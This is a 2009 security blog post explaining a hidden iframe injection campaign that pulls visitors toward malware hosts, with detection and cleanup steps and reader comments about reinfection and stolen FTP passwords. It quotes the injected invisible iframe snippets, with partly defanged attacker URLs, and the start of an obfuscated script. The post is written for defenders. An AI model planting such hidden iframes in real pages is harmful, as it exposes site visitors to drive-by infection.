msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Gogo2me – Hidden IFrame Injection.

   14 Jan 09   Filed in Website exploits

New Year has come with a new surge of website exploits. I see many help requests on BadwareBusters caused by the same problem.

Symptoms

  1. In Google search results, your site links are marked with a “This site may harm your computer” warning and you see an abrupt decrease in Google search traffic.
  2. When trying to open your web pages, users of Firefox 3 and Google Chrome browsers see a warning that your site is an “attack site”.
  3. If your site is registered with Google Webmaster Tools or AdWords, you receive an email from Google notifying that your site is a reported attack site and some of your web pages link to the following sites that host malicious software: 94 .247 .2 .0/ and gogo2me .net/
  4. Google’s Safe Browsing Diagnostics pages for your site also report that your site links to 94 .247 .2 .0/ and gogo2me .net/

Detection

Temporarily disable JavaScript in your browser (if you don’t want to get infected) and open your site. In the browser’s menu choose “view source” and search for the following code:

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>

It is usually located right after the <body> tag or after the closing </html> tag.

If found, this hidden IFrame is followed by a long obfuscated script that does all the bad things. This script starts with a code that looks like this:

<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){...

The actual content of this script vary from site to site but it always starts with a function with a long name containing random chars and digits.

Hidden IFrame in Unmask Parasites

Hidden IFrame in Unmask Parasites

The easier and safer way to detect this exploit is to check suspected web pages with Unmask Parasites.

The hidden iframe is easily detected and reported in the External References section. The distinctive feature of this particular exploit is this strange iframe source: “http://url/”

I don’t know why hackers injected this IFrame that doesn’t load anything. Maybe it was a script kiddie who forgot to replace the placeholder with a real URL. Or maybe this harmless iframe was injected just to check if the files are really writable and then they injected really malicious code. Who knows.

How this exploit works?

IFrames

IFrame is a third party page inserted into your own web page. There are multiple totally legitimate applications of iframes (e.g widgets, previews, etc.) but hackers also like iframes because they can have unsuspecting web surfers load malicious web pages while browsing legitimate websites.

To hide the fact that a web page contains unwanted iframes, hackers make their iframes invisible. For example, in this exploit the first iframe is created with width and height of 1 pixel – visually it’s just a point. In addition they specify a style that makes it invisible: style=’visibility: hidden;’

Obfuscated script

While hidden IFrames are invisible to web surfers, they can be easily detected in the HTML code. To hide iframes in the HTML, hackers inject obfuscated scripts that create iframes on the fly when someone loads web pages. When you check the HTML code of such web pages you don’t see any iframes, just some JavaScript with unclear purpose with no URLs and suspicious words within it. And since many modern web pages contain dozens of third-party scripts (e.g. ads, statistics, widgets, etc.) webmasters usually overlook such scripts.

To hide malicious code, hackers encode their scripts multiple time, so that even if you execute such a script you’ll get just another obfuscated script.

In this exploit, the malicious script decodes itself and creates another encoded script, which in turn creates the following hidden (note the style) iframe (I slightly changed the iframe source):

<iframe name=c10 src='http://gogo2me .net/.xx/xxxxx.html'
width=461 height=215 style='visibility:hidden'></iframe>

Here we can see the Gogo2me site that Google reported to us. So where is the other “94 .247 .2 .0/” site?

I loaded the page from Gogo2me site and it contained another hidden iframe (I slightly changed the script name again):

<iframe style="position: absolute; top: 10; left: 124; width: 546px;
height: 524px; visibility: hidden" frameborder="0" scrolling="no"
src="http://94 .247 .2 .157/.xxx/xx.php?sid=1"></iframe>

Yes. This is that “94 .247 .2 .0/” site. Google always replaces the last number in IP addresses with 0 in its security reports.

So what is so malicious in this iframe?

This last IFrame loads a small (about 7Kbytes) binary file (gzipped script) that exploits Windows and browser vulnerabilities to infect your site visitors’ computers .

I sent this file to VirusTotal, and it was detected as virus by only 2 (Sophos and Microsoft) out of 39 antivirus tools. So even most fresh antiviruses won’t prevent the infection. Every site visitor is potentially in danger.

This is why Google blacklists your site if it finds hidden links to malware software.

How to clean up?

I don’t have information about how this malicious code is being injected into web pages, so I can only provide some general common-sense advice.

  1. Locate and remove the malicious code (the iframe and the script) from your server files (or upload a fresh copy from a backup).
  2. Write-protect files (644 permissions on *nix).
  3. Check your local computer for viruses and spyware.
  4. Change all site-related passwords (FTP, Control Panel, etc.)
  5. You might also want to contact your hosting provider to investigate the issue.
  6. When you believe your site is clean, request a review via Google’s Webmaster Tools.

If you have any questions, comments or can share any additional information about this exploit, please leave your messages in the comment section below.

Similar posts:

Reader's Comments (29)

  1. |

    Hi there

    I’m the webmaster of this website, and this error keeps happening. I’ve done everything suggested above, and it still happens. I send a “clean” version of the website, and within 3 hours the malicious code re-appears. I’m at my wits end now, I have no idea why this is happening, and am getting concerned as the business the website is for gets most of it’s customers through the website, and because of the google message regarding it being unsafe I’ve had to take the main part of it down.

    If there’s anything you can suggest to help I would be more than grateful!

    Cheers

    Haydn Gleed

  2. |

    I too have done all the procedures given and contacted my hosting people.. they too are not able to help me please try and suggest some permanent solution

    • |

      It looks like you are using Dreamweaver for your site. Are you storing FTP password in it? There is a theory that some trojans can steal FTP passwords stored in Dreamweaver. I don’t have any proofs though.

  3. |

    I have found the solution (I hope so)… Wat you need to do is firstly block the
    ip: 77.221.133.188
    You need to give your files 644 privilege, and folders with 755 privilege..
    and then send MSG to Google to rectifier warning.

    • |

      Why this IP? Do you have any evidence? Logs?

      I’m really interested in any information about this issue.

      • |

        I happened to find this Ip details and found that this ip is from Europe. Firstly I do’t have any visitors from Europe, second point is after this Ip visitor is not showing any browser details, Lastly after this ip visitor my site was effected again.. But ya blocking Ip is not the final solution… Even though i have blocked the Ip my site has been effected again.. If any body has any suggestion please help me out…

  4. |

    @Rakesh::

    why do you say block that IP? aren’t there hackers from IPs all over the universe? don’t they do things like spoof their IP #s and such? or use proxies? And we have done all the recommended steps but these hackers do it anyway and I have no idea how. except it is the crappiest hosting service we could have chosen and they won’t refund our money.

    Meanwhile is Anyone using servage.net for hosting? If you are, 99% chance the iframe injection has happened to you and you don’t even know it — they are the worst and they hate their customers because they will not do anything to help fix or secure their servers or help customers nor even admit they have a problem.

    They blame their customers and offer no help to customise your security settings to prevent hackers — who return within hours to re-hack and reinject the malicious code injections.

    Beware as the site warns. We discovered it too late.

    • |

      @PetLove: do you still have a site on that hosting? I’d like to take a look at it and other sites on the same server (I need the IP address of the server.)

      While your hoster may be not very friendly and helpful, I don’t think it’s a hosting-specific problem. I’ve seen this problem on many other hostings too.

      Could you contact me if the problem persists? I need more information about file permissions, server scripts, FTP client, etc..

      • |

        can you help me out with solution for this problem, I have given 644 privilege for files and folders with 755 privilege. but again the injection has happened

    • |

      you are true All tho I have blocked Ip my site has been injected with iframes again.. If you have any solution for the same please help me out..

  5. |

    We’ve been battling this one and other variations here at work for a while now.

    We are 99.99% sure the root cause is ftp credentials being harvested on local machines via some unrecognized malware and being feed over to lists used by the ‘bad guys’. The bad guys then turn their scripts loose on these ftp accounts, they cruise through the site injecting the mentioned code into any file matching the criteria.

    Our theory sync’d up well with the analysis here http://www.abuse.ch/?p=737

    The quick fix is to remove the code from your pages, and *delete* your ftp accounts.

    The long fix is to probably reinstall Windows unless you can find a product that can identify and remove this particular malware, which as of yet we haven’t got a name for.

    No amount of changing passwords or file permissions will amount to much as they are getting in as *you* to your own ftp accounts.

    Finally, this ‘ftp injection’ is also distributed – we’ve seen hundreds of ips, making it impossible to block effectively.

    Good luck.

  6. |

    I would like to find information on how this malicious script into the site and where it hides.
    It would be good to know

  7. |

    I don’t believe that this is always done through a compromised ftp login. This type of hack has now transformed into something very nasty. It actually has the ability to change the domain’s directory permissions to 777.

    • |

      I also have some doubts, but it’s the best explanation I have when see pure html statics websites exploited. There is no way to inject SQL commands or some nasty script. And yes, using FTP, intruders can change file/directory permissions.

      Do you have evidence that this exploit changes directory permissions to 777?

  8. |

    Do any of you have an update? We’ve been experiencing this problem also – except that there is no evidence in the event log, or IIS logs, or FTP logs. Do any of you have logfiles showing this exploit? I personally do not believe that it is FTP .

    • |

      I don’t have access to compromised systems so I can only tell about things I can see from outside.

      Compromised sites I’ve seen are very different – statics and dynamic. Various web servers: Apache, IIS. FTP is the most viable way to compromise such different site.

      Anyway, if you have all internal logs you should be able to detect the changes in files. Let me know if you find the answer.

  9. |

    That’s what I’m saying … I do have all the logfiles and they show nil. I have turned logging up to the maximum detail.

  10. |

    Hi all, my website was under attack too. I don’t have javascript or programmer knowledge, please help me out. Many thanks.

    • |

      James, I checked your site and found the Gogo2me obfuscated iframe there so I removed the link to your site from your comment (so that other visitors don’t get infected if they click on your link).

      You don’t actually need any programming skills. Just replace server files with a clean copy. Make sure your own computer is not infected by spyware. Then change all passwords. Don’t store your passwords inside programs that upload files to server. And consider contacting your hosting provider.

  11. |

    Thanks for the post and the comments. But I have a question:

    “Temporarily disable JavaScript in your browser (if you don’t want to get infected) and open your site”.

    Do you possibly know, precisely which browsers are vulnerable? Should I simply avoid using Internet Explorer? Is browsing using a Firefox 3 with JavaScript enabled safe? I would rather not disable JS completely, but if it is necessary, I will.

    Also, say I found and downloaded some antivirus software which correctly detects the malware that the injected IFRAME elements download (http://www.virustotal.com/analisis/3dfacd15cfe5b67d14a3d03b8ac27a32). If I scan the computer with them, am I 100% safe? Maybe that binary executable is just assistant software, which then downloads the virus itself?…

    I am afraid that these are rhetorical questions, at least for now, but possible answers will be appreciated. :)

    • |

      The advice about disabling JavaScript was made only to detect the malicious script on a web page. It’s only for webmasters who want to find what’s wrong on their site. No advise here is intended to regular web surfers.

      Every browser is vulnerable. Get yourself a decent antivirus and firewall. Update your browser and OS regularly. Move to a Mac or Linux to minimize security threats. If you are using FireFox – consider the NoScript plugin.

      No antivirus is perfect. You can get the antivirus that detects that particular malware, but what about thousands of other viruses and spyware?

  12. |

    Hey All,

    I too have had my site compromised with the iframe attack.

    System: Mac OSX 10.5.6
    Host: BlueHost.com
    Installs: WP, Drupal and MT
    Date of Compromise: 040709

    The malicious code looked like this:

    iframe src=”http:// cheapslotplay .cn/ in.cgi ? income47″ width=1 height=1 style=”visibility: hidden”>

    and

    I first learned of the compromise when a twitter follower notified me of a malware alert when he came to my site.

    I poked around and discovered the multitude of appended to end of my source code.

    A quick (grep -r “<iframe” .) in console informed me that hundreds of pages had been hacked (index, home, main, default).

    Long story short I found a script that will go in and clean up your site. It was $10 and well worth it. You don’t have to know any code so James your in luck.

    The code is only set up for “goooogleadsence . biz” so if your attack is from a different site you have to change the name. Easiest thing to do is find and replace that url with the your pest url, save, run and repeat the process for other urls. In my case I had 3 different ones.

    I got the code here: http://www.yourjoomlapro.com/

    So far so good… I’ve changed my passwords and permissions so we’ll see if they strike again.

    Hope this helps.

    • |

      Usually the easiest (and free) way to remove injected stuff is to reupload a clean content from a backup.

      Anyway, the most important step is to prevent reinfection.

  13. |

    I’ve had the same problem on my test server these last few weeks. Thankfully I have nightly backups. Anyway, after some research I thought it might be related to PHP’s register_globals setting. Turns out I was right. The damn setting was on.

    Now that I’ve cleared it, attacks have stopped. You all might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.

    Cheers :)

    Akash

  14. |

    My site received the same attack recently…
    I believe the FileZilla FTP credentials were being used by some virus…
    Changed passwords to my ftp accounts, and set file/directory permissions to 644/755, cleaned up my windows system.. and since then have moved to Ubuntu… didn’t see the attack again in last two weeks.

  15. |

    [...] they aware of the attack. You should also change your password for your site immediately. There are various sites on how to recover files and clean up your [...]

  16. |

    [...] http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/ [...]